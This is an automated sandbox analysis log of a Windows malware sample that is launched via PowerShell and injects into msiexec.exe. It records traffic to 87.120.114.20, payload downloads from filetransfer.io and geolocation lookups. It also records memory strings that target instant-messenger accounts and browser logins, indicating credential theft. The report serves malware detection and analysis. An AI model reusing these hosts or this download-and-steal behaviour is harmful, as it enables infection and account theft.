              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.114.20
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.114.20
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.114.20
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.114.20
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.114.20
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.114.20
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.114.20
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.114.20
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.114.20
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.114.20
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.114.20
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.114.20
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.114.20
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.114.20
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.114.20
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.114.20
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.114.20
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.114.20
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.114.20
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.114.20
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.114.20
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.114.20
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.114.20
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.114.20
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.114.20
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.114.20
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.114.20
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.114.20
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.114.20
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.114.20
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_214D9293 LdrInitializeThunk,send,send,send,send,send,send,send,send,send,send,LdrInitializeThunk,recv,recv,LdrInitializeThunk,recv,LdrInitializeThunk,setsockopt,ioctlsocket,4_2_214D9293
              Source: global trafficHTTP traffic detected: GET /data-package/kpFdlS7h/download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: filetransfer.ioCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /storage/download/DSOnK3w83O1d HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: s20.filetransfer.ioConnection: Keep-AliveCookie: nette-samesite=1; PHPSESSID=cavpeluj70i7r0fo9pbtami48v
              Source: global trafficHTTP traffic detected: GET /crx/blobs/AYA8VyyVmiyWvldTRU0qGaR4RUSL6-YrG6uKRsMPsRWu4uzTWsENQ0Oe4TwjJlNxU5Vx3wW0XCsKQHAJ2XkWCO0eQ7UF3N9B6xg6w6N4ZQ_ezL5_s1EfR63s25vMOuhpdI4AxlKa5cntVqVuAOGwNK_pRVduNn5fPIzZ/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_83_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /config/v1/Edge/94.0.992.31?clientId=6757335511995507682&osname=win&client=edge&channel=stable&scpfull=0&scpguard=0&scpfre=0&osver=10.0.19042&osarch=x86_64&osedition=professional&wu=1&devicefamily=desktop&uma=0&mngd=0&installdate=1630626147 HTTP/1.1Host: config.edge.skype.comConnection: keep-aliveIf-None-Match: "mOB9Fluqaq+mietxhYXSL2cAH0KxdzECs1csHpZVA18="Accept-Encoding: gzipSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
              Source: msiexec.exe, 00000009.00000003.144184175754.0000000004D31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: "ntathome.com"},{"applied_policy":"OnlyExposeWidevine","domain":"wowpresentsplus.com"},{"applied_policy":"OnlyExposeWidevine","domain":"vhx.tv"},{"applied_policy":"OnlyExposePlayReady","domain":"hulu.com"},{"applied_policy":"OnlyExposeWidevine","domain":"app.quickhelp.com"},{"applied_policy":"OnlyExposeWidevine","domain":"DishAnywhere.com"}],"policies":[{"name":"OnlyExposePlayReady","type":"Playready"},{"name":"OnlyExposeWidevine","type":"Widevine"}],"version":1},"codec_override":{"applications":[{"applied_policy":"HideMfHevcCodec","domain":"tv.apple.com"},{"applied_policy":"HideMfHevcCodec","domain":"nintendo.com"}],"policies":[{"name":"HideMfHevcCodec","type":"MfHevcCodec"}],"version":1},"content_filter_on_off_switch":{"applications":[{"applied_policy":"ContentFilter","domain":"microsoft.com"}],"policies":[{"name":"ContentFilter"}],"version":1},"ecp_override":{"applications":[{"applied_policy":"PlainTextURLsOnly","domain":"hangouts.google.com"},{"applied_policy":"PlainTextURLsOnly","domain":"chat.google.com"},{"applied_policy":"PlainTextURLsOnly","domain":"slack.com"},{"applied_policy":"PlainTextURLsOnly","domain":"facebook.com"},{"applied_policy":"PlainTextURLsOnly","domain":"wechat.com"},{"applied_policy":"PlainTextURLsOnly","domain":"weixin.com"},{"applied_policy":"PlainTextURLsOnly","domain":"qq.com"},{"applied_policy":"PlainTextURLsOnly","domain":"webex.com"},{"applied_policy":"PlainTextURLsOnly","domain":"wordpress.com"},{"applied_policy":"PlainTextURLsOnly","domain":"twitter.com"},{"applied_policy":"PlainTextURLsOnly","domain":"discord.com"}],"policies":[{"name":"PlainTextURLsOnly","type":"ECPOnlyPlaintextURLs"}],"version":1},"idl_override":{"applications":[{"applied_policy":"ExposePrefixedEME","domain":"netflix.com"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.co.jp"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.co.uk"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.com"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.de"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.es"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.fr"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.in"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.it"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.ca"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.com.br"},{"applied_policy":"ExposePrefixedEME","domain":"sling.com"},{"applied_policy":"ExposePrefixedEME","domain":"openidconnectweb.azurewebsites.net"}],"policies":[{"name":"ExposePrefixedEME","type":"PrefixedEme"}],"version":1},"media_foundation_override":{"applications":[{"applied_policy":"OptIn","domain":"youtube.com","path_exclude":["/shorts","/kids"],"subdomain_exclude":["tv.youtube.com","studio.youtube.com","vr.youtube.com"]}],"policies":[{"name":"OptIn","type":"MediaFoundationOptIn"},{"name":"OptOut","type":"MediaFoundationOptOut"}],"version":1},"web_notification_ov
              Source: msiexec.exe, 00000009.00000003.144184175754.0000000004D31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: "ntathome.com"},{"applied_policy":"OnlyExposeWidevine","domain":"wowpresentsplus.com"},{"applied_policy":"OnlyExposeWidevine","domain":"vhx.tv"},{"applied_policy":"OnlyExposePlayReady","domain":"hulu.com"},{"applied_policy":"OnlyExposeWidevine","domain":"app.quickhelp.com"},{"applied_policy":"OnlyExposeWidevine","domain":"DishAnywhere.com"}],"policies":[{"name":"OnlyExposePlayReady","type":"Playready"},{"name":"OnlyExposeWidevine","type":"Widevine"}],"version":1},"codec_override":{"applications":[{"applied_policy":"HideMfHevcCodec","domain":"tv.apple.com"},{"applied_policy":"HideMfHevcCodec","domain":"nintendo.com"}],"policies":[{"name":"HideMfHevcCodec","type":"MfHevcCodec"}],"version":1},"content_filter_on_off_switch":{"applications":[{"applied_policy":"ContentFilter","domain":"microsoft.com"}],"policies":[{"name":"ContentFilter"}],"version":1},"ecp_override":{"applications":[{"applied_policy":"PlainTextURLsOnly","domain":"hangouts.google.com"},{"applied_policy":"PlainTextURLsOnly","domain":"chat.google.com"},{"applied_policy":"PlainTextURLsOnly","domain":"slack.com"},{"applied_policy":"PlainTextURLsOnly","domain":"facebook.com"},{"applied_policy":"PlainTextURLsOnly","domain":"wechat.com"},{"applied_policy":"PlainTextURLsOnly","domain":"weixin.com"},{"applied_policy":"PlainTextURLsOnly","domain":"qq.com"},{"applied_policy":"PlainTextURLsOnly","domain":"webex.com"},{"applied_policy":"PlainTextURLsOnly","domain":"wordpress.com"},{"applied_policy":"PlainTextURLsOnly","domain":"twitter.com"},{"applied_policy":"PlainTextURLsOnly","domain":"discord.com"}],"policies":[{"name":"PlainTextURLsOnly","type":"ECPOnlyPlaintextURLs"}],"version":1},"idl_override":{"applications":[{"applied_policy":"ExposePrefixedEME","domain":"netflix.com"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.co.jp"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.co.uk"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.com"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.de"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.es"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.fr"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.in"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.it"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.ca"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.com.br"},{"applied_policy":"ExposePrefixedEME","domain":"sling.com"},{"applied_policy":"ExposePrefixedEME","domain":"openidconnectweb.azurewebsites.net"}],"policies":[{"name":"ExposePrefixedEME","type":"PrefixedEme"}],"version":1},"media_foundation_override":{"applications":[{"applied_policy":"OptIn","domain":"youtube.com","path_exclude":["/shorts","/kids"],"subdomain_exclude":["tv.youtube.com","studio.youtube.com","vr.youtube.com"]}],"policies":[{"name":"OptIn","type":"MediaFoundationOptIn"},{"name":"OptOut","type":"MediaFoundationOptOut"}],"version":1},"web_notification_ov
              Source: msiexec.exe, 00000004.00000002.148901845750.0000000021E20000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000B.00000002.144171198666.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
              Source: msiexec.exe, msiexec.exe, 0000000B.00000002.144171198666.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
              Source: msiexec.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
              Source: chrome.exe, 00000008.00000002.144258729862.000012AC00640000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144258258607.000012AC00510000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144262325708.000012AC00D8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
              Source: chrome.exe, 00000008.00000002.144258258607.000012AC00510000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html7 equals www.youtube.com (Youtube)
              Source: msiexec.exe, 00000009.00000003.144189148646.000000000331A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ld=16.0.14326&p=0&a=1&hm=1&sp=0&fpEnabled=1https://odc.officeapps.live.com/odc/v2.1/hrdres://C:\Windows\system32\mmcndmgr.dll/views.htmhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
              Source: msiexec.exe, 00000009.00000003.144189148646.000000000331A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ld=16.0.14326&p=0&a=1&hm=1&sp=0&fpEnabled=1https://odc.officeapps.live.com/odc/v2.1/hrdres://C:\Windows\system32\mmcndmgr.dll/views.htmhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
              Source: msiexec.exe, 00000004.00000002.148901215405.0000000021CF0000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
              Source: msiexec.exe, 00000004.00000002.148901215405.0000000021CF0000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
              Source: global trafficDNS traffic detected: DNS query: filetransfer.io
              Source: global trafficDNS traffic detected: DNS query: s20.filetransfer.io
              Source: global trafficDNS traffic detected: DNS query: geoplugin.net
              Source: global trafficDNS traffic detected: DNS query: clients2.googleusercontent.com
              Source: global trafficDNS traffic detected: DNS query: ntp.msn.com
              Source: global trafficDNS traffic detected: DNS query: sb.scorecardresearch.com
              Source: global trafficDNS traffic detected: DNS query: assets.msn.com
              Source: global trafficDNS traffic detected: DNS query: api.msn.com
              Source: global trafficDNS traffic detected: DNS query: c.msn.com
              Source: global trafficDNS traffic detected: DNS query: deff.nelreports.net
              Source: global trafficDNS traffic detected: DNS query: chrome.cloudflare-dns.com
              Source: global trafficDNS traffic detected: DNS query: dns.quad9.net
              Source: unknownHTTP traffic detected: POST /RST2.srf HTTP/1.0Connection: Keep-AliveContent-Type: application/soap+xmlAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19042.0.0; IDCRL-cfg 16.000.29143.3; App svchost.exe, 10.0.19041.546, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})Content-Length: 4742Host: login.live.com
              Source: global trafficTCP traffic: 192.168.11.20:57096 -> 239.255.255.250:1900
              Source: global trafficTCP traffic: 192.168.11.20:57096 -> 239.255.255.250:1900
              Source: global trafficTCP traffic: 192.168.11.20:57096 -> 239.255.255.250:1900
              Source: global trafficTCP traffic: 192.168.11.20:57096 -> 239.255.255.250:1900
              Source: global trafficTCP traffic: 192.168.11.20:59059 -> 239.255.255.250:1900
              Source: global trafficTCP traffic: 192.168.11.20:59059 -> 239.255.255.250:1900
              Source: global trafficTCP traffic: 192.168.11.20:59059 -> 239.255.255.250:1900
              Source: global trafficTCP traffic: 192.168.11.20:59059 -> 239.255.255.250:1900
              Source: chrome.exe, 00000008.00000002.144258771870.000012AC006B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144258340243.000012AC00560000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/1423136
              Source: msedge.exe, 0000000F.00000002.144316730054.0000642800454000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000F.00000003.144303100044.0000642800450000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/1452
              Source: msedge.exe, 0000000F.00000002.144316730054.0000642800454000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000F.00000003.144303100044.0000642800450000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/2152
              Source: msedge.exe, 0000000F.00000002.144316730054.0000642800454000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000F.00000003.144303100044.0000642800450000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3246
              Source: msedge.exe, 0000000F.00000002.144316730054.0000642800454000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000F.00000003.144303100044.0000642800450000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3682
              Source: chrome.exe, 00000008.00000002.144261762952.000012AC00C50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144258340243.000012AC00560000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/40096371
              Source: chrome.exe, 00000008.00000002.144261762952.000012AC00C50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144258340243.000012AC00560000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/40096608
              Source: chrome.exe, 00000008.00000002.144261762952.000012AC00C50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144258340243.000012AC00560000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/40096838
              Source: chrome.exe, 00000008.00000002.144261762952.000012AC00C50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144258340243.000012AC00560000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/40644627
              Source: chrome.exe, 00000008.00000002.144261762952.000012AC00C50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144258771870.000012AC006B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144258340243.000012AC00560000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/40644912
              Source: chrome.exe, 00000008.00000002.144261762952.000012AC00C50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144258978540.000012AC0070C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144258340243.000012AC00560000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/41488637
              Source: chrome.exe, 00000008.00000002.144261762952.000012AC00C50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144258340243.000012AC00560000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/42261924
              Source: chrome.exe, 00000008.00000002.144258771870.000012AC006B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144258340243.000012AC00560000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/42263580
              Source: chrome.exe, 00000008.00000002.144261762952.000012AC00C50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144258340243.000012AC00560000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/42264193
              Source: chrome.exe, 00000008.00000002.144261762952.000012AC00C50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144258340243.000012AC00560000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/42264287
              Source: chrome.exe, 00000008.00000002.144261762952.000012AC00C50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144258340243.000012AC00560000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/42264571
              Source: chrome.exe, 00000008.00000002.144258978540.000012AC0070C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144258340243.000012AC00560000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/42265509
              Source: chrome.exe, 00000008.00000002.144258771870.000012AC006B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144258340243.000012AC00560000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/42266194
              Source: chrome.exe, 00000008.00000002.144258771870.000012AC006B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144258340243.000012AC00560000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/42266231
              Source: chrome.exe, 00000008.00000002.144261762952.000012AC00C50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144258340243.000012AC00560000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/42266232
              Source: chrome.exe, 00000008.00000002.144258978540.000012AC0070C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144258340243.000012AC00560000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/42266842
              Source: msedge.exe, 0000000F.00000002.144316730054.0000642800454000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000F.00000003.144303100044.0000642800450000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4722
              Source: msedge.exe, 0000000F.00000002.144316730054.0000642800454000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000F.00000003.144303100044.0000642800450000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5007
              Source: msedge.exe, 0000000F.00000002.144316730054.0000642800454000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000F.00000003.144303100044.0000642800450000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5750
              Source: msedge.exe, 0000000F.00000002.144316730054.0000642800454000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000F.00000003.144303100044.0000642800450000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6041
              Source: bhvB3DD.tmp.9.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
              Source: bhvB3DD.tmp.9.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
              Source: chrome.exe, 00000008.00000002.144257037264.000012AC00288000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://clients2.google.com/time/1/current
              Source: chrome.exe, 00000008.00000002.144259921127.000012AC0086C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://clientservices.googleapis.com/chrome-variations/seed?osname=win&channel=stable&milestone=128
              Source: msedge.exe, 0000000F.00000002.144316730054.0000642800454000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000F.00000003.144303100044.0000642800450000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crbug.com/1165751
              Source: chrome.exe, 00000008.00000002.144261807161.000012AC00C9C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144258340243.000012AC00560000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.144206111077.000012AC00C9C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000F.00000002.144316730054.0000642800454000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000F.00000003.144303100044.0000642800450000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crbug.com/941620
              Source: powershell.exe, 00000002.00000002.144017518011.000000000303E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000003.144118475021.00000000054B5000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.148892015439.00000000054A1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000003.144079911503.00000000054B6000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000003.144080071726.00000000054B5000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000003.144377552368.00000000054A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
              Source: powershell.exe, 00000002.00000002.144017518011.000000000303E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000003.144118475021.00000000054B5000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.148892015439.00000000054A1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000003.144079911503.00000000054B6000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000003.144080071726.00000000054B5000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000003.144377552368.00000000054A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
              Source: powershell.exe, 00000002.00000002.144018533141.0000000003277000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micr
              Source: bhvB3DD.tmp.9.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
              Source: bhvB3DD.tmp.9.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
              Source: bhvB3DD.tmp.9.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
              Source: chrome.exe, 00000008.00000002.144263008450.000012AC00EC8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://dns-tunnel-check.googlezip.net/connect
              Source: chrome.exe, 00000008.00000002.144257461471.000012AC003A1000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.144230458674.000012AC003A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromew
              Source: chrome.exe, 00000008.00000002.144257461471.000012AC003A1000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.144230458674.000012AC003A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewbstore/
              Source: chrome.exe, 00000008.00000002.144260042929.000012AC008A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvNzI0QUFXNV9zT2RvdUwy
              Source: msiexec.exe, 00000004.00000003.144377552368.0000000005496000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.148899066974.0000000021140000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000003.144143401043.0000000021162000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
              Source: msiexec.exe, 00000004.00000002.148899066974.0000000021140000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpq
              Source: msiexec.exe, 00000004.00000003.144377552368.0000000005496000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.148892015439.0000000005496000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpt
              Source: chrome.exe, 00000008.00000002.144255665782.000012AC000A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://google.com/
              Source: rPO3799039985.exe, rPO3799039985.exe.2.drString found in binary or memory: http://nsis.sf.net/NSIS_Error
              Source: rPO3799039985.exe, rPO3799039985.exe.2.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
              Source: powershell.exe, 00000002.00000002.144023424474.0000000005F29000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: bhvB3DD.tmp.9.drString found in binary or memory: http://ocsp.digicert.com0
              Source: powershell.exe, 00000002.00000002.144019020175.0000000005018000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000002.00000002.144019020175.0000000005018000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png4
              Source: powershell.exe, 00000002.00000002.144019020175.0000000004EC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: chrome.exe, 00000008.00000002.144260631416.000012AC009A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://unisolated.invalid/
              Source: powershell.exe, 00000002.00000002.144019020175.0000000005018000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: powershell.exe, 00000002.00000002.144019020175.0000000005018000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html4
              Source: msiexec.exe, msiexec.exe, 0000000B.00000002.144171198666.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
              Source: msiexec.exe, msiexec.exe, 0000000B.00000003.144170842635.00000000031AD000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.144170955946.00000000031AD000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.144171198666.0000000000400000.00000040.80000000.00040000.00000000.sdmp, msiexec.exe, 0000000B.00000003.144171023674.00000000031AD000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.144172323389.00000000031AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.com
